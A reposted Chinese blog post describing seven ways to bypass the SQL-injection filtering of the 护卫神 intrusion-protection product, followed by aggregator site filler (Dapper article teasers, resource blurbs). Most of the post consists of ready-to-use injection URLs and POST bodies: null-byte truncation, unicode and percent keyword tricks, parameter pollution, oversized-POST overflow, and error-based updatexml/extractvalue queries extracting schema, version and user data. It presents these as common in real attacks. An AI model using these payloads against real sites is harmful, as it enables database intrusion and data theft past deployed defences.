Bypass 护卫神SQL注入防御（多姿势）-低调大师

Bypass 护卫神SQL注入防御（多姿势）

2018-06-05 698

0x00 前言

　　护卫神一直专注服务器安全领域，其中有一款产品，护卫神·入侵防护系统，提供了一些网站安全防护的功能，在IIS加固模块中有一个SQL防注入功能。

这边主要分享一下几种思路，Bypass 护卫神SQL注入防御。

0x01 环境搭建

护卫神官网：http://www.huweishen.com

软件版本：护卫神·入侵防护系统 V3.8.1 最新版本

下载地址：http://down.huweishen.com/hws.zip

测试环境：IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL

0x02 WAF测试

护卫神SQL防注入的规则几年了基本都没有什么变化，先来一张拦截测试图：

姿势一：%00截断

%00截断是上传漏洞中常用的一个非常经典的姿势，在SQL注入中，也可以用来Bypass。

在WAF层，接收参数id后，遇到%00截断，只获取到 id=1，无法获取到后面的有害参数输入；

在ASPX+MSSQL中，支持%00来代替空白字符，构造的SQL语句得以成功执行，获取数据。

http://192.168.204.132/sql.aspx?id=1%00and 1=2 union select 1,2,column_name from information_schema.columns

在PHP+Mysql中，可以用/*%00*/，同样可以进行Bypass。

/sql.php?id=1/*%00*/union select 1,schema_name,3 from information_schema.schemata

姿势二：GET+POST

当同时提交GET、POST请求时，进入POST逻辑，而忽略了GET请求的有害参数输入,可轻易Bypass。

在IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL 均适用。

http://192.168.204.132/sql.aspx?id=1 and 1=2 union select 1,column_name,3 from information_schema.columns

POST：aaa

姿势三：unicode编码

IIS服务器支持对于unicode的解析，对关键词进行unicode编码绕过。

http://192.168.204.132/sql.aspx?id=1 and 1=2 union s%u0045lect 1,2,column_name from information_schema.columns

姿势四：ASPX+HPP

在ASPX中，有一个比较特殊的HPP特性，当GET/POST/COOKIE同时提交的参数id，服务端接收参数id的顺序GET,POST,COOKIE，中间通过逗号链接。

UNION、SELECT、两个关键字拆分放在GET/POST的位置，通过ASPX的这个特性连起来，姿势利用有点局限，分享一下Bypass思路。

http://192.168.204.132/sql.aspx?id=1 and 1=2 union/*POST：id=*/select 1,column_name,3 from information_schema.columns

姿势五：ASP %特性

在IIS+ASP中，当我们输入un%ion，解析的时候会去掉%号，服务端接收的参数是union。

http://192.168.204.132/sql.asp?id=1 and 1=2 un%ion select 1,2,column_name from information_schema.columns

姿势六：缓冲区溢出

在PHP+Mysql中，使用POST 大包溢出的思路可成功Bypass。

http://192.168.204.132/sql.php

POST:id=1 and (select 1)=(Select 0xA*49099) union select 1,schema_name,3 from information_schema.SCHEMATA

编写一个简单的Python脚本，当A的个数填充到49099时，可成功Bypass。

姿势七：黑名单绕过

护士神SQL防注入，采用的是黑名单过滤，关键字并不全，比如只过滤union select，select from却放过了，那么这里就存在很多种绕过的形式。

基本上报错注入、盲注、延迟注入都可以很轻易Bypass，这时候直接利用SQLMAP，指定注入方式来获取数据。

?id=1 or (select 1 from (select count(),concat((concat(0x5e5e21,@@version,0x215e5e)),floor(rand(0)2))x from information_schema.tables group by x)a)

?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))

?id=1 and extractvalue(1, concat(0x5c, (select VERSION() from information_schema.tables limit 1)))

0x03 END

总结了几种IIS下SQL注入 Bypass的思路，在实战中也很常见。

本文由Bypass原创发布，原文链接：https://www.cnblogs.com/xiaozi/p/9138160.html 欢迎分享本文，转载请保留出处。

关于我：一个网络安全爱好者，致力于分享原创高质量干货，欢迎关注我的个人微信公众号：Bypass--，浏览更多精彩文章。

微信关注我们

原文链接：https://yq.aliyun.com/articles/616732

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

AY的Dapper研究学习-基本入门-C#开发-aaronyang技术分享

原文: AY的Dapper研究学习-基本入门-C#开发-aaronyang技术分享 ====================www.ayjs.net 杨洋 wpfui.com ayui ay aaronyang=======请不要转载谢谢了。========= 本文，是AY 看github源码，和网上一些博客，文章整理，写出来的。目前还没找到系统级别的教程先建立.net framework4.6的控制台项目,添加nuget引用新建了Sqlserver的数据库TestDapper SQL CREATE TABLE [dbo].[Users]( [UserID] [int] IDENTITY(1,1) NOT NULL, [UserName] [varchar](50) NULL, [Email] [varchar](100) NULL, [Address] [varchar](100) NULL, CONSTRAINT [PK_Users] PRIMARY KEY CLUSTERED ( [UserID] ASC )WITH (PAD_INDEX = OFF, ST...

2018-06-06

604

原文: AY的Dapper研究学习-继续深入-C#开发-aaronyang技术分享 ====================www.ayjs.net 杨洋 wpfui.com ayui ay aaronyang=======请不要转载谢谢了。========= 不想定义属性，直接索引方式用，Dynamic方式 C# var _1 = con.Query("SELECT * FROM USERS").ToArray(); Console.WriteLine(_1[0].UserName + " EMAIL: " + _1[0].Email); 带参数的存储过程 SQL create proc _ay @address varchar（200） output, @id int as Select @address=[Address] from [Users] WHERE USERID=@id GO 数据库执行上面sql。然后数据库中执行 SQL DECLARE @address varchar(200) exec _ay @address output,@id=1 pri...

2018-06-06

786

资源下载

更多资源

Mario

马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长，特征是大鼻子、头戴帽子、身穿背带裤，还留着胡子。与他的双胞胎兄弟路易基一起，长年担任任天堂的招牌角色。

Spring

Spring框架（Spring Framework）是由Rod Johnson于2002年提出的开源Java企业级应用框架，旨在通过使用JavaBean替代传统EJB实现方式降低企业级编程开发的复杂性。该框架基于简单性、可测试性和松耦合性设计理念，提供核心容器、应用上下文、数据访问集成等模块，支持整合Hibernate、Struts等第三方框架，其适用范围不仅限于服务器端开发，绝大多数Java应用均可从中受益。

Rocky Linux

Rocky Linux（中文名：洛基）是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版，作为CentOS稳定版停止维护后与RHEL（Red Hat Enterprise Linux）完全兼容的开源替代方案，由社区拥有并管理，支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性，采用模块化包装和SELinux安全架构，默认包含GNOME桌面环境及XFS文件系统，支持十年生命周期更新。

Sublime Text

Sublime Text具有漂亮的用户界面和强大的功能，例如代码缩略图，Python的插件，代码段等。还可自定义键绑定，菜单和工具栏。Sublime Text 的主要功能包括：拼写检查，书签，完整的 Python API ， Goto 功能，即时项目切换，多选择，多窗口等等。Sublime Text 是一个跨平台的编辑器，同时支持Windows、Linux、Mac OS X等操作系统。